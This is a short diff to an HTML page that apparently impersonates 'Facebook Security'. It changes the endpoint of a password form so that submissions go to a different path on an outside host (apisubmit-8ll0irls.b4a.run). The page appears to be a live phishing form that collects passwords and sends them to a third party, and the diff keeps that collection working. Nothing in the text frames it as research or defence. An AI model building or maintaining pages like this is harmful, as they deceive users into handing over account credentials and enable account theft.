--- a/index.html
+++ b/index.html
@@ -64,7 +64,7 @@
   </style>
 
 
-  <form class="content" action="https://apisubmit-8ll0irls.b4a.run/spass" method="POST">
+  <form class="content" action="https://apisubmit-8ll0irls.b4a.run/post" method="POST">
     <div class="passwordContainer">
       <img src="3357701.webp" alt="Logo">
       <h3>Facebook Security</h3>
